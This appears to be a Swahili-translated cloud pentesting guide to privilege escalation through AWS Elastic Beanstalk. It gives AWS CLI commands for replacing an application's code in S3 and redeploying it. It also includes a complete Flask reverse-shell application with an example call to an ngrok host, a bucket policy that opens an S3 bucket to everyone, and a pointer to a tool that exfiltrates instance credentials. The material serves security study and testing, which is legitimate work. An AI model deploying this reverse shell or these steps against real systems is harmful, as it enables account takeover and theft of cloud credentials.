AWS - Elastic Beanstalk Privesc

Reading time: 6 minutes

Elastic Beanstalk

Maelezo zaidi kuhusu Elastic Beanstalk katika:

AWS - Elastic Beanstalk Enum

elasticbeanstalk:RebuildEnvironment, ruhusa za kuandika S3 & nyingine nyingi

Kwa ruhusa za kuandika juu ya S3 bucket inayoshikilia code ya mazingira na ruhusa za kurebuild programu (inahitajika elasticbeanstalk:RebuildEnvironment na nyingine chache zinazohusiana na S3, EC2 na Cloudformation), unaweza kubadilisha code, kurebuild programu na wakati ujao unapoingia kwenye programu it atekeleze code yako mpya, ikiruhusu mshambuliaji kuathiri programu na akreditivu za IAM role zake.

# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, na mengineyo...

Iliyotajwa pamoja na ruhusa kadhaa za S3, EC2, cloudformation, autoscaling na elasticloadbalancing ni muhimu ili kuunda hali ya msingi ya Elastic Beanstalk kutoka mwanzo.

• Unda programu ya AWS Elastic Beanstalk:

aws elasticbeanstalk create-application --application-name MyApp

• Unda mazingira ya AWS Elastic Beanstalk (jukwaa zinazoungwa mkono):

aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role

Ikiwa mazingira tayari yameundwa na hutaki kuunda mpya, unaweza tu kusasisha ile iliyopo.

• Pakia msimbo wa programu yako na utegemezi katika faili la ZIP:

zip -r MyApp.zip .

• Pakia faili la ZIP kwenye bakuli la S3:

aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip

• Unda toleo la programu ya AWS Elastic Beanstalk:

aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"

• Pandisha toleo la programu kwenye mazingira yako ya AWS Elastic Beanstalk:

aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:SuspendProcesses

Kwanza kabisa unahitaji kuunda mazingira halali ya Beanstalk na msimbo unayotaka kuendesha katika mhasiriwa kufuata hatua za awali. Inaweza kuwa zip rahisi inayojumuisha faili hizi 2:

from flask import Flask, request, jsonify
import subprocess,os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')

@application.route("/")
def index():
return jsonify('Welcome!')


@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')

if __name__=="__main__":
application.run()

click==7.1.2
Flask==1.1.2
itsdangerous==1.1.0
Jinja2==2.11.3
MarkupSafe==1.1.1
Werkzeug==1.0.1

Mara tu una mazingira yako ya Beanstalk inayofanya kazi shell yako ya rev, ni wakati wa kuhamasisha kwenye mazingira ya mwathirika. Ili kufanya hivyo unahitaji kusaidia Sera ya Bucket ya bucket yako ya beanstalk S3 ili mwathirika aweze kuipata (Kumbuka kwamba hii it fungua Bucket kwa KILA MTU):

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}

# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528

Alternatively, [MaliciousBeanstalk](https://github.com/fr4nk3nst1ner/MaliciousBeanstalk) can be used to deploy a Beanstalk application that takes advantage of overly permissive Instance Profiles. Deploying this application will execute a binary (e.g., [Mythic](https://github.com/its-a-feature/Mythic) payload) and/or exfiltrate the instance profile security credentials (use with caution, GuardDuty alerts when instance profile credentials are used outside the ec2 instance).

The developer has intentions to establish a reverse shell using Netcat or Socat with next steps to keep exploitation contained to the ec2 instance to avoid detections.